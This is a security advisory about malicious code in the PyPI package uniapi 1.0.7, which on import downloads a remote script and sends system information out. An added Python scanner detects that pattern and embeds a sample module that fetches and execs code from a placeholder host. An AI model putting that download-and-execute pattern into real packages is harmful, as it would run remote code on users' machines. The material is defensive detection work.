PT-2025-5637 · Pypi · Uniapi
Published
2025-01-27
·
Updated
2025-01-27
No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.
Name of the Vulnerable Software and Affected Versions:
uniapi version 1.0.7
Description:
The issue concerns code introduced in uniapi version 1.0.7 that executes upon import of the module. This code downloads a script from a remote URL and runs it in a thread; the downloaded script harvests system information and sends it to another remote URL using the POST method. The malicious code was found in the PyPI release artifacts but was not present in the public GitHub repository.
Recommendations:
For uniapi version 1.0.7, consider removing or uninstalling this version to prevent the execution of the malicious code. As a temporary workaround, consider restricting network access to prevent the downloaded script from sending system information to remote URLs. Avoid using uniapi version 1.0.7 until a safe version is available.
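As an added check (not code from the advisory or the uniapi project), the following Python script statically flags the import-time pattern described above: module-level statements that fetch remote content next to statements that exec it or start a thread. The sample module and its URL are constructed placeholders; the scanner only parses them.

```python
"""Static check for the import-time pattern the advisory describes: module-level
code that fetches remote content and hands it to exec() or a thread. Added example,
not code from the advisory or uniapi; the constructed sample is parsed, never executed."""
import ast

FETCH_NAMES = {"urlopen", "urlretrieve"}                 # urllib.request
REQUESTS_METHODS = {"get", "post", "request"}            # requests.<method>
EXEC_NAMES = {"exec", "eval", "Thread", "threading.Thread",
              "subprocess.Popen", "subprocess.run", "os.system"}

def _dotted(func: ast.AST) -> str:
    """'a.b.c(...)' -> 'a.b.c'; 'f(...)' -> 'f'; anything else -> ''."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))

def _is_fetch(name: str) -> bool:
    last = name.rsplit(".", 1)[-1]
    return last in FETCH_NAMES or (name.startswith("requests.") and last in REQUESTS_METHODS)

def scan_import_time(source: str) -> dict:
    """Line numbers of fetch and exec/dispatch calls that run on import:
    module-level statements (try/if blocks included), not def/class bodies."""
    found = {"fetch": [], "exec": []}
    for stmt in ast.parse(source).body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue                      # only defines code, runs nothing on import
        for node in ast.walk(stmt):
            if isinstance(node, ast.Call):
                name = _dotted(node.func)
                if _is_fetch(name):
                    found["fetch"].append(node.lineno)
                elif name in EXEC_NAMES:
                    found["exec"].append(node.lineno)
    found["suspicious"] = bool(found["fetch"] and found["exec"])
    return found

# Constructed sample with a placeholder URL; mirrors the advisory's pattern.
SAMPLE_MODULE = '''\
import threading
from urllib.request import urlopen
def helper(url):          # inside a def: does not run on import
    return urlopen(url)
payload = urlopen("https://stage2.example.invalid/s.py").read()
threading.Thread(target=exec, args=(payload,)).start()
'''
```

Run `scan_import_time()` over each module of an unpacked wheel or sdist; a hit is a prompt to read that file, not a verdict, since legitimate packages occasionally fetch data on import.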
Affected Products
Uniapi